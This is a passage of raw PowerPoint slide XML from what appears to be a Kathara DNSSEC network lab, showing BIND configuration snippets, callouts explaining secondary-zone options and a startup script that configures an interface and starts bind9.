              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>indicates where on disk BIND should save the copy of the zone it receives from the master</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10900730-7EA8-FAD2-261C-550EF6F83C30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5931516" y="4993296"/>
            <a:ext cx="3830316" cy="941320"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -59803"/>
              <a:gd name="adj2" fmla="val -124922"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>specifies the IP address of the Master (Primary) server from which to download data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162738241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775AD9-5466-5BE3-F5FA-081D82DB3DB5}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58BC1522-683C-1655-1385-86B814E89BD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67C1E53-2B62-34AF-3742-8D5C3D64C1CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C198F857-3B26-60C0-CD6C-03E452C13BD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9B5EE2-DC64-521E-C60B-557079F25FC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442148"/>
            <a:ext cx="7087578" cy="1973704"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5E8D25-BC46-06A9-6B20-FE5F51C9EA8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>options{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    directory “/var/cache/bind”;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    allow-query {any; };</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    recursion no;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>};</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDFA80F-4077-43A5-5023-A06ABAD81BD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nsroot2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="342101155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9DF417-DB00-4B28-A760-E630DC220BF9}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C1AA3B-2FFD-AB3C-5015-C4DADABF87F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDC86D78-BC5E-C5E4-100D-F536AE3299B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD404AE6-8757-5CDC-4D23-19C479A21246}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB7A5ECB-5AC5-E207-76CD-FC4ECA29DCAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442150"/>
            <a:ext cx="7087578" cy="2176656"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3047EB4-FEC8-ED27-99F5-B135412B6F11}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="800"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 100.0.75.10/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add default via 100.0.75.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/cache/bind/keys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 775 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{478C76A6-B5D8-449F-F3F0-5313E6B2C48E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40176965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60F31A-9171-DC36-32C5-1D2867853F35}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E02E9F3-2819-D314-B5AC-105EB6397B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{243F08ED-0F7B-0942-0908-16777CFCB756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
